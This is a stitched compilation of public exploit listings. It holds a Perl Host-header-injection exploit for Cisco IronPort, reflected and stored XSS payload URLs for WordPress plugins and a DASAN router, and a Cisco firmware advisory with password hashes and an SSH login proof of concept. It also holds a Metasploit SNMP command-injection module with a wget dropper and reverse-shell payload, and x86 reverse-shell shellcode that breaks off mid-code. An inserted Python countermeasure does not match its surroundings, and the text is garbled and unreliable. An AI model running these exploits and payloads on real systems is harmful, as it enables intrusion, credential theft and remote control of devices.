# as the value of "Bla: " in line 10 because of the missing CRLF.
#
#
# At this point the web server responds to the GET in line 8 by sending
# the content of /poison.html to the proxy. The proxy, expecting a
# response to the GET request in line 11, mistakenly matches the reply
# from the webserver with contents from /poison.html to the page /index.html.
# Therefore, the contents of /poison.html are cached under the name /index.html
# on the proxy. Now any user who requests http://somewhere.com/index.html
# through the proxy will receive the contents of http://somewhere.com/poison.html
# instead.
#
# There are several options available to mitigate this attack but all of
# them have their downside. If possible, use a well tested web server such
# as Apache or IIS. Otherwise, you can turn off server-side page caching,
# but this can lead to significant performance problems such as increased
# server load and latency. A final option is to use SSL communication for
# everything (HTTPS instead of HTTP), but this too has an associated
# performance overhead.
#
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'scam-page.com';


print "# Cisco Email Security Virtual Appliance C380 IronPort Remote Header 'Host' Injection
# ===================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
    print "# e.g. perl $0 https://target:port/ scam-page.com
";
    exit;
}

my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(
    protocols_allowed => ['http', 'https'],
    ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->agent($user_agent);

# Send a POST with an attacker-controlled Host header and check whether the
# appliance reflects that value in its response.
my $request = HTTP::Request->new(POST => $host, [Content_Type => "application/x-www-form-urlencoded"], "");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
print "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# > $_ => ", $request->header($_) for $request->header_field_names;
say "# < $_ => ", $response->header($_) for $response->header_field_names;
print "# ===================================================================================\n";
# \Q...\E quotes the dots in the hostname so it is matched literally, not as a regex
if (defined($response->content) and ($response->content =~ m/\Q$attacker\E/)){
    print "# IronPort is Poisoned! Exploitation successful\n";
    exit;
} else {
    print "# Exploitation failed!!!\n";
    exit;
}
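The strict-parsing countermeasure listed in the comment block above, as an added Python example rather than code from the original script: a request-framing parser that rejects the 14-line sample message outright instead of guessing which Content-Length to trust, the way the proxy and server in the walkthrough do. The sample byte strings are constructed from that listing.

```python
"""Strict HTTP/1.1 request framing, as a countermeasure to the smuggling example.

Added example, not part of the original script: instead of 'fixing' a request
that carries two conflicting Content-Length headers, the parser refuses it.
"""
import re


class FramingError(ValueError):
    """The request's body length cannot be determined unambiguously."""


# Constructed sample: the 14-line request from the comment block above.
# Line 10 ("Bla: ") has no CRLF, so line 11 becomes its header value.
SMUGGLED = (
    b"POST http://somewhere.com/example.html HTTP/1.1\r\n"
    b"Host: somewhere.com\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 0\r\n"
    b"Content-Length: 53\r\n"
    b"\r\n"
    b"GET /poison.html HTTP/1.1\r\n"
    b"Host: somewhere.com\r\n"
    b"Bla: "
    b"GET http://somewhere.com/index.html HTTP/1.1\r\n"
    b"Host: somewhere.com\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n"
)

# Constructed sample: a well-framed POST followed by a GET on the same connection.
CLEAN = (
    b"POST /example.html HTTP/1.1\r\n"
    b"Host: somewhere.com\r\n"
    b"Content-Length: 5\r\n"
    b"\r\n"
    b"a=b&c"
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: somewhere.com\r\n"
    b"\r\n"
)


def body_length(headers):
    """Return the body length only when the headers declare it unambiguously."""
    names = [name for name, _ in headers]
    if b"transfer-encoding" in names:
        # RFC 7230 section 3.3.3 flags Transfer-Encoding combined with
        # Content-Length as a smuggling signature; chunked decoding is out of scope here.
        raise FramingError("Transfer-Encoding present; not accepted by this example")
    values = [value for name, value in headers if name == b"content-length"]
    if not values:
        return 0
    if len(set(values)) > 1:
        # RFC 7230 section 3.3.2 requires rejecting differing values; the proxy and
        # server in the example each trusted a different one instead.
        raise FramingError("conflicting Content-Length values: %r" % values)
    if len(values) > 1 or not re.fullmatch(rb"[0-9]+", values[0]):
        raise FramingError("duplicate or non-numeric Content-Length: %r" % values)
    return int(values[0])


def parse_request(data, offset=0):
    """Parse one request at `offset`; return (request_line, headers, body, next_offset)."""
    end = data.find(b"\r\n\r\n", offset)
    if end == -1:
        raise FramingError("header block not terminated by CRLF CRLF")
    lines = data[offset:end].split(b"\r\n")
    request_line = lines[0].decode("ascii", "replace")
    headers = []
    for raw in lines[1:]:
        name, sep, value = raw.partition(b":")
        # Reject bare LF, empty lines, missing colons and whitespace before the colon.
        if b"\n" in raw or not sep or not name or name != name.strip():
            raise FramingError("malformed header line: %r" % raw)
        headers.append((name.lower(), value.strip()))
    body_start = end + 4
    length = body_length(headers)
    body = data[body_start:body_start + length]
    if len(body) != length:
        raise FramingError("declared Content-Length exceeds the data received")
    return request_line, headers, body, body_start + length


def check_stream(data):
    """Split a pipelined byte stream into requests, refusing any ambiguous framing.

    Returns ("ok", request_count) or ("rejected", reason).
    """
    requests, offset = [], 0
    try:
        while offset < len(data):
            request_line, _, body, offset = parse_request(data, offset)
            requests.append((request_line, body))
    except FramingError as exc:
        return "rejected", str(exc)
    return "ok", len(requests)


if __name__ == "__main__":
    for label, sample in (("smuggled", SMUGGLED), ("clean", CLEAN)):
        print(label, check_stream(sample))
```

A proxy that applies this rule never forwards the poisoned message, so the cache entry for /index.html is never mismatched in the first place.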

WordPress Spryng Payments WooCommerce 1.6.7 Cross Site Scripting


WordPress Spryng Payments WooCommerce plugin version 1.6.7 suffers from a cross site scripting vulnerability.


MD5 | 8f22fb3fa01aeb9ff354e99195e0c3a2

Class: Input Validation Error
Remote: Yes

Credit: Ricardo Sanchez
Vulnerable: Spryng payments woocommerce 1.6.7

Spryng payments woocommerce is prone to a reflected cross-site scripting
vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.
To exploit this issue, follow these steps:
The XSS is reflected because the url value is not filtered correctly:

Demo Request GET:
http://54.174.186.120//wordpress/wp-content/plugins/spryng-payments-woocommerce/views/public/threed_authenticate.php?url=http://google.es%22%20%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%20%3Cdemo=%22

WordPress Download Manager 2.9.93 Cross Site Scripting


Wordpress Download Manager plugin version 2.9.93 suffers from a cross site scripting vulnerability.


MD5 | af5c5a1b2e2fb0a1b5baad7e5701341a

* Exploit Title: WordPress Download Manager Cross-site Scripting
* Discovery Date: 2019-04-13
* Exploit Author: ThuraMoeMyint
* Author Link: https://twitter.com/mgthuramoemyint
* Vendor Homepage: https://www.wpdownloadmanager.com
* Software Link: https://wordpress.org/plugins/download-manager
* Version: 2.9.93
* Category: WebApps, WordPress
CVE:CVE-2019-15889
Description
--

In the pro features of the WordPress download manager plugin, there is
a Category Short-code feature which can be used to sort categories with
an order-by function, used as ?orderby=title,publish_date.
By adding the parameter "> followed by any XSS payload, the XSS payload will execute.

To reproduce:

1. Go to the link where we can find ?orderby
2. Add the parameters >” and give a simple payload like <script>alert(1)</script>
3. The payload will execute.
--

PoC
--

<div class="btn-group btn-group-sm pull-right"><button type="button"
class="btn btn-primary" disabled="disabled">Order &nbsp;</button><a
class="btn btn-primary"
href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=asc">Asc</a><a
class="btn btn-primary"
href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=desc">Desc</a></div>

--
Demo
--
https://server/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc
--


Another reflected cross-site scripting via advance search

https://server/wpdmpro/advanced-search/

https://server/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a


DASAN Zhone ZNID GPON 2426A EU Cross Site Scripting


DASAN Zhone ZNID GPON 2426A EU versions S3.1.285 and below suffer from multiple cross site scripting vulnerabilities.


MD5 | 6d52de97c5b07a7fd040eee129a2b002

Multiple Cross-Site Scripting (XSS) vulnerabilities in the web interface of the DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allow a remote attacker to execute arbitrary JavaScript via manipulation of unsanitized GET parameters.

# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU

# Date: 31.03.2019

# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl

# Vendor Homepage: https://dasanzhone.com

# Version: <= S3.1.285

# Alternate Version: <= S3.0.738

# Tested on: version S3.1.285 (alternate version S3.0.738)

# CVE : CVE-2019-10677


= Reflected Cross-Site Scripting (XSS) =

http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp


= Stored Cross-Site Scripting (XSS) =

* WiFi network plaintext password

http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//

http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//

* CSRF token

http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//


= Clickjacking =

<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>

Cisco Device Hardcoded Credentials / GNU glibc / BusyBox


Many Cisco devices such as Cisco RV340, Cisco RV340W, Cisco RV345, Cisco RV345P, Cisco RV260, Cisco RV260P, Cisco RV260W, Cisco 160, and Cisco 160W suffer from having hard-coded credentials, known GNU glibc, known BusyBox, and IoT Inspector identified vulnerabilities.


MD5 | c446ad84eeb90a116264677ada159562

SEC Consult Vulnerability Lab Security Advisory < 20190904-0 >
=======================================================================
title: Multiple vulnerabilities
product: Cisco RV340, Cisco RV340W, Cisco RV345, Cisco RV345P,
Cisco RV260, Cisco RV260P, Cisco RV260W, Cisco 160,
Cisco 160W
vulnerable version: Cisco RV34X - 1.0.02.16, Cisco RV16X/26X - 1.0.00.15
fixed version: see "Solution"
CVE number: -
impact: High
homepage: https://www.cisco.com/
found: 2019-05-15
by: T. Weber, S. Viehböck (Office Vienna)
IoT Inspector
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Securely connecting your small business to the outside world is as important
as connecting your internal network devices to one another. Cisco Small
Business RV Series Routers offer virtual private networking (VPN) technology
so your remote workers can connect to your network through a secure Internet
pathway."

Source: https://www.cisco.com/c/en/us/products/routers/small-business-rv-series-routers/index.html


Business recommendation:
------------------------
We want to thank Cisco for the very quick and professional response and great
coordination. Customers are urged to update the firmware of their devices.


Vulnerability overview/description:
-----------------------------------
1) Hardcoded Credentials
The device contains hardcoded users and passwords which can be used to login
via SSH on an emulated device at least.

During the communication with Cisco it turned out that:
"Accounts like the 'debug-admin' and 'root' can not be accessed
from console port, CLI or webui".
Therefore, these accounts had no real functionality and cannot be used for
malicious actions.

2) Known GNU glibc Vulnerabilities
The used GNU glibc in version 2.19 is outdated and contains multiple known
vulnerabilities. The outdated version was found by IoT Inspector. One of
the discovered vulnerabilities (CVE-2015-7547, "getaddrinfo() buffer overflow")
was verified by using the MEDUSA scalable firmware runtime.

3) Known BusyBox Vulnerabilities
The used BusyBox toolkit in version 1.23.2 is outdated and contains multiple
known vulnerabilities. The outdated version was found by IoT Inspector.
One of the discovered vulnerabilities (CVE-2017-16544) was verified by using
the MEDUSA scalable firmware runtime.


4) Multiple Vulnerabilities - IoT Inspector Report
Further information can be found in IoT Inspector report:
https://r.sec-consult.com/ciscoiot


Proof of concept:
-----------------
1) Hardcoded Credentials
The following hardcoded hashes were found in the 'shadow' file of the firmware:
root:$1$hPNSjUZA$7eKqEpqVYltt9xJ6f0OGf0:15533:0:99999:7:::
debug-admin:$1$.AAm0iJ4$na9wZwly9pSrdS8MhcGKw/:15541:0:99999:7:::
[...]

The undocumented user 'debug-admin' is also contained in this file.

Starting the dropbear daemon as background process on emulated firmware:
-------------------------------------------------------------------------------
# dropbear -E
# [1109] <timestamp> Running in background
#
# [1112] <timestamp> Child connection from <IP>:52718
[1112] <timestamp> /var must be owned by user or root, and not writable by others
[1112] <timestamp> Password auth succeeded for 'debug-admin' from <IP>:52718
-------------------------------------------------------------------------------

Log on via another host connected to the same network. For this PoC the
password of the debug-admin was changed in the 'shadow' file.
-------------------------------------------------------------------------------
[root@localhost medusa]# ssh debug-admin@<IP> /bin/ash -i
debug-admin@<IP>'s password:
/bin/ash: can't access tty; job control turned off


BusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash)

/tmp $
-------------------------------------------------------------------------------

The 'debug-admin' user has the same privileges as 'root'. This can be
determined from the corresponding sudoers file in the firmware:
[...]
## User privilege specification
##
root ALL=(ALL) ALL
debug-admin ALL=(ALL) ALL

## Uncomment to allow members of group wheel to execute any command
# %wheel ALL=(ALL) ALL
[...]

During the communication with Cisco it turned out that:
"Accounts like the 'debug-admin' and 'root' can not be accessed
from console port, CLI or webui".
Therefore, these accounts had no real functionality and cannot be used for
malicious actions.

2) Known GNU glibc Vulnerabilities
GNU glibc version 2.19 contains multiple CVEs like:
CVE-2014-4043, CVE-2014-9402, CVE-2014-9761, CVE-2014-9984, CVE-2015-1472,
CVE-2015-5277, CVE-2015-8778, CVE-2015-8779, CVE-2017-1000366 and more.

The getaddrinfo() buffer overflow vulnerability was checked with the help of
the exploit code from https://github.com/fjserna/CVE-2015-7547. It was compiled
and executed on the emulated device to test the system.

# python cve-2015-7547-poc.py &
[1] 961
# chroot /medusa_rootfs/ bin/ash


BusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash)

# gdb cve-2015-7547_glibc_getaddrinfo
[...]
[UDP] Total Data len recv 36
[UDP] Total Data len recv 36
Connected with 127.0.0.1:41782
[TCP] Total Data len recv 76
[TCP] Request1 len recv 36
[TCP] Request2 len recv 36
Cannot access memory at address 0x4

Program received signal SIGSEGV, Segmentation fault.
0x76f1fd58 in ?? () from /lib/libc.so.6
(gdb)

References:
https://security.googleblog.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html
https://github.com/fjserna/CVE-2015-7547


3) Known BusyBox Vulnerabilities
BusyBox version 1.23.2 contains multiple CVEs like:
CVE-2016-2148, CVE-2016-6301, CVE-2015-9261, CVE-2016-2147, CVE-2018-20679,
CVE-2017-16544 and CVE-2019-5747.
The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on
an emulated device:

A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the
vulnerability.
-------------------------------------------------------------------------------
# ls "pressing <TAB>"
test
]55;test.txt
#
-------------------------------------------------------------------------------

4) Multiple Vulnerabilities - IoT Inspector Report
Further information can be found in IoT Inspector report:
https://r.sec-consult.com/ciscoiot

The summary is below:
IoT Inspector Vulnerability #1 BusyBox CVE entries
Outdated BusyBox version is affected by 7 published CVEs.

IoT Inspector Vulnerability #2 curl CVE entries
Outdated curl version is affected by 35 published CVEs.

IoT Inspector Vulnerability #3 GNU glibc CVE entries
Outdated GNU glibc version is affected by 44 published CVEs.

IoT Inspector Vulnerability #4 GNU glibc getaddrinfo() buffer overflow
Outdated GNU glibc version is affected by CVE-2015-7547.

IoT Inspector Vulnerability #5 Hardcoded password hashes
Firmware contains multiple hardcoded credentials.

IoT Inspector Vulnerability #6 Linux Kernel CVE entries
Outdated Linux Kernel version affected by 512 published CVEs.

IoT Inspector Vulnerability #7 MiniUPnPd CVE entries
Outdated MiniUPnPd version affected by 2 published CVEs.

IoT Inspector Vulnerability #8 Dnsmasq CVE entries
Outdated MiniUPnPd version affected by 1 published CVE.

IoT Inspector Vulnerability #9 Linux Kernel Privilege Escalation “pp_key”
Outdated Linux Kernel version is affected by CVE-2015-7547.

IoT Inspector Vulnerability #10 OpenSSL CVE entries
Outdated OpenSSL version affected by 6 published CVEs.


Vulnerable / tested versions:
-----------------------------
The following firmware versions have been tested with IoT Inspector and
firmware emulation techniques:
Cisco RV340 / 1.0.02.16
Cisco RV340W / 1.0.02.16
Cisco RV345 / 1.0.02.16
Cisco RV345P / 1.0.02.16
The following firmware versions have been tested with IoT Inspector only:
Cisco RV260 / 1.0.00.15
Cisco RV260P / 1.0.00.15
Cisco RV260W / 1.0.00.15
Cisco RV160 / 1.0.00.15
Cisco RV160P / 1.0.00.15

The firmware was obtained from the vendor website:
https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.02.16
https://software.cisco.com/download/home/286316464/type/282465789/release/1.0.00.15


Vendor contact timeline:
------------------------
2019-05-15: Contacting vendor through psirt@cisco.com.
2019-05-16: Vendor confirmed the receipt.
2019-05 to 2019-08: Periodic updates about the investigation from the vendor.
Clarification which of the reported issues will be fixed.
2019-08-20: The vendor proposed the next possible publication date for the
advisory for 2019-09-04. The vendor added the RV160 and RV260
router series to be vulnerable to the same issues too.
2019-09-04: Coordinated advisory release.


Solution:
---------
Upgrade to the newest available firmware version.

Additionally, the vendor provides the following security notice:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190904-sb-vpnrouter


Workaround:
-----------
None.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T. Weber / @2019


AwindInc SNMP Service Command Injection


This Metasploit module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection. A valid SNMP read-write community is required to exploit this vulnerability.


MD5 | 94829d03a77b5dc73a93c44541b6a8a3

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SNMPClient
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "AwindInc SNMP Service Command Injection",
      'Description'    => %q{
        This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection.
        A valid SNMP read-write community is required to exploit this vulnerability.

        The following devices are known to be affected by this issue:

        * Crestron Airmedia AM-100 <= version 1.5.0.4
        * Crestron Airmedia AM-101 <= version 2.5.0.12
        * Awind WiPG-1600w <= version 2.0.1.8
        * Awind WiPG-2000d <= version 2.1.6.2
        * Barco wePresent 2000 <= version 2.1.5.7
        * Newline Trucast 2 <= version 2.1.0.5
        * Newline Trucast 3 <= version 2.1.3.7
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Quentin Kaiser <kaiserquentin[at]gmail.com>'
        ],
      'References'     =>
        [
          ['CVE', '2017-16709'],
          ['URL', 'https://github.com/QKaiser/awind-research'],
          ['URL', 'https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/']
        ],
      'DisclosureDate' => '2019-03-27',
      'Platform'       => ['unix', 'linux'],
      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
      'Privileged'     => true,
      'Targets'        => [
        ['Unix In-Memory',
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          'Type' => :unix_memory,
          'Payload' => {
            'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl'}
          }
        ],
        ['Linux Dropper',
          'Platform' => 'linux',
          'Arch' => ARCH_ARMLE,
          'CmdStagerFlavor' => %w[wget],
          'Type' => :linux_dropper
        ]
      ],
      'DefaultTarget'  => 1,
      'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'}))

    register_options(
      [
        OptString.new('COMMUNITY', [true, 'SNMP Community String', 'private']),
      ])
  end


  def check
    begin
      connect_snmp
      sys_description = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
      print_status("Target system is #{sys_description}")
      # AM-100 and AM-101 considered EOL, no fix so no need to check version.
      model = sys_description.scan(/Crestron Electronics (AM-100|AM-101)/).flatten.first
      case model
      when 'AM-100', 'AM-101'
        return CheckCode::Vulnerable
      else
        # TODO: insert description check for other vulnerable models (that I don't have)
        # In the meantime, we return 'safe'.
        return CheckCode::Safe
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
    Exploit::CheckCode::Unknown
  end

  def inject_payload(cmd)
    begin
      connect_snmp
      varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,1,0],SNMP::OctetString.new(cmd))
      resp = snmp.set(varbind)
      if resp.error_status == :noError
        print_status("Injection successful")
      else
        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
  end

  def trigger
    begin
      connect_snmp
      varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,5,0],SNMP::Integer32.new(1))
      resp = snmp.set(varbind)
      if resp.error_status == :noError
        print_status("Trigger successful")
      else
        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
  end

  def exploit
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end

  def execute_command(cmd, opts = {})
    # The payload must start with a valid FTP URI otherwise the injection point is not reached
    cmd = "ftp://1.1.1.1/$(#{cmd.to_s})"

    # When the FTP download fails, the script calls /etc/reboot.sh and we loose the callback
    # We therefore kill /etc/reboot.sh before it reaches /sbin/reboot with that command and
    # keep our reverse shell opened :)
    cmd << "$(pkill -f /etc/reboot.sh)"

    # the MIB states that camFWUpgradeFTPURL must be 255 bytes long so we pad
    cmd << "A" * (255-cmd.length)

    # we inject our payload in camFWUpgradeFTPURL
    print_status("Injecting payload")
    inject_payload(cmd)

    # we trigger the firmware download via FTP, which will end up calling this
    # "/bin/getRemoteURL.sh %s %s %s %d"
    print_status("Triggering call")
    trigger
  end
end

WordPress API Bearer Auth 20181229 Cross Site Scripting


WordPress API Bearer Auth plugin version 20181229 suffers from a cross site scripting vulnerability.


MD5 | 5d068887a0b5f3b6e9222803c164d5ae

Class: Input Validation Error
Remote: Yes

Credit: Ricardo Sanchez
Vulnerable: Api bearer auth 20181229

Api bearer auth is prone to a reflected cross-site scripting vulnerability
because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.
To exploit this issue, follow these steps:
The XSS is reflected because the url value is not filtered correctly:

Demo Request GET:
http://localhost/wordpress/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert(%22R1XS4.COM%22)%3C/script%3E

Linux/x86 TCP Reverse Shell 127.0.0.1 Nullbyte Free Shellcode


Linux/x86 TCP reverse shell 127.0.0.1 nullbyte free shellcode.


MD5 | 99e7f76d43a55a51387066637b961f4a

/*
; name : Exploit Title: Linux/x86 - TCP reverse shell 127.0.0.1 nullbyte free
; date : 04th sept, 2019
; author : Sandro "guly" Zaccarini
; twitter : @theguly
; blog : https://gulyslae.github.io/
; SLAE32 : SLAE-1037
; purpose : the program will create a new connection to 127.0.0.1:4444 and spawns a shell
; this code has been written as extramile for SLAE32 assignment 2
; license : CC-BY-NC-SA

global _start
section .text

_start:
; start by zeroing eax,ebx. not really needed because registers are clean, but better safe than sorry
xor eax,eax
xor ebx,ebx

; ----------------------------------------------------------------------------------------
; purpose : create a socket
; references : man socket
; description :
; socketcall is the syscall used to work with socket. i'm going to use this syscall to create and connect
; the very first thing i have to do, is to create the socket itself. by reading references, i see that she needs 3 registers:
; eax => syscall id 0x66 for socketcall, that will be the same for every socketcall call of course and that's why i created a function on top
; ebx => socket call id, that is 0x1 for socket creation
; ecx => pointer to socket args
;
; man socket shows me that socket's args are:
; domain => AF_INET because i'm creating a inet socket, and is 0x2
; type => tcp is referenced as STREAM, that is 0x1
; protocol => unneeded here because there is no inner protocol, so i'll use 0x0

; now, i'm creating ecx because a zeroed eax is perfect for the purpose
; arg will be pushed in reverse order with no hardcoded address: 0, 1, 2
push eax
inc eax
push eax
inc eax
push eax

; because socketcall needs a pointer, i'm moving esp address to ecx
mov ecx,esp

; prepare eax to hold the socketcall value as discussed before. i'm not hardcoding 0x66 to (try to) fool some static analysis: 0x33 is sysacct and looks harmless to me
mov al,0x33
add al,0x33

; because ebx has been zeroed, i can just inc to have it to 1 for socketcall to call socket (pun intended :) )
inc ebx

; do the call and create socket
int 0x80

; because syscall rets to eax, if everything's good, eax will hold socket file descriptor: save it to esi to store it safe for the whole run
mov esi,eax

; ----------------------------------------------------------------------------------------
; purpose : connect to raddr:rport
; references : man connect , man 7 ip
; description :
; eax => syscall id 0x66 for socketcall
; ebx => connect call id, 0x3 taken from linux/net.h
; ecx => pointer to address struct
;
; man connect shows me that args are:
; sockfd => already saved in esi
; address => pointer to ip struct
; addrlen => addrlen is 32bit (0x10)
;
; man 7 ip shows address struct details. arguments are:
; family => AF_INET, so 0x2
; port => hardcoded 4444
; addr => 127.0.0.1

; zero again
xor eax,eax

; push arg in reverse and move the pointer to ecx
; prepare stack pointer to addr struct defined in man 7 ip
; as exercise, i'm going to use 127.0.0.1 as remote address, because it contains null bytes
; hex value of 127.0.0.1 is 0x0100007f
; pushing 0x00000000 to esp by using a known null register. i could also have used sub esp,0x8 because i have enough room, or mov eax,[esp] or another zillion of similar instructions
push eax
mov byte [esp], 0x7f
; now esp is: 0x0000007f
mov byte [esp+3],0x01
; now esp is: 0x0100007f

; push port to bind to, 4444 in hex, to adhere to msf defaults :)
push word 0x5c11
; push AF_INET value as word again
inc ebx
push word bx
; get stack pointer to ecx
mov ecx,esp

; same call to have 0x66 to eax and do socketcall
mov al,0x33
add al,0x33

; push arg, again in reverse order
push eax
; pointer to addr struct
push ecx
; sockfd, saved before to esi
push esi
; stack pointer to ecx again, to feed bind socketcall
mov ecx,esp

; ebx is 0x2, i need 0x3
inc ebx

; do the call
int 0x80

; ----------------------------------------------------------------------------------------
; purpose : create fd used by /bin//sh
; references : man dup2
; description : every shell has three file descriptors: STDIN(0), STDOUT(1), STDERR(2)
; this code will create said fd
; eax => 0x3f
; ebx => clientid
; ecx => newfd id, said file descriptor
;
; i'm going to create them by looping using ecx, to save some instruction. ecx will start at 2, then is dec and fd is created.
; as soon as ecx is 0, the loop ends


; i'm using a different method from one i've used for bindshell just to try.
; i'll put 0x3 to ecx to start creating STDERR just after dec
; ecx is dirty but edx is 0x0, just swap them
; edit: actually, running from a C code you'll have edx dirty. zero it...
xor edx,edx
xchg ecx,edx
mov cl,0x3

; copy socket fd to ebx to feed clientid
mov ebx,esi

; zero eax and start the loop
xor eax,eax

; dup2 call id
mov al,0x3f
; dec ecx to have 2,1,0
dec ecx
int 0x80

mov al,0x3f
; dec ecx to have 2,1,0
dec ecx
int 0x80

mov al,0x3f
; dec ecx to have 2,1,0
dec ecx
int 0x80

; ----------------------------------------------------------------------------------------
; purpose : spawn /bin//sh
; references : man execve
; description : put /bin//sh on the stack, aligned to 8 bytes to prevent 0x00 in the shellcode itself
; and null terminating it by pushing a zeroed register at first
; eax => execve call, 0xB
; ebx => pointer to executed string, which will be /bin//sh null terminated
; ecx => pointer to args to executed command, that could be 0x0
; edx => pointer to environment, which could be 0x0
;
; i need to push a null byte to terminate the string, i know ecx is 0x0 so i can save one op
push ecx
push 0x68732f2f
push 0x6e69622f
; here the stack will look like a null terminated /bin//sh:
; /bin//sh\0\0\0\0\0\0\0\0

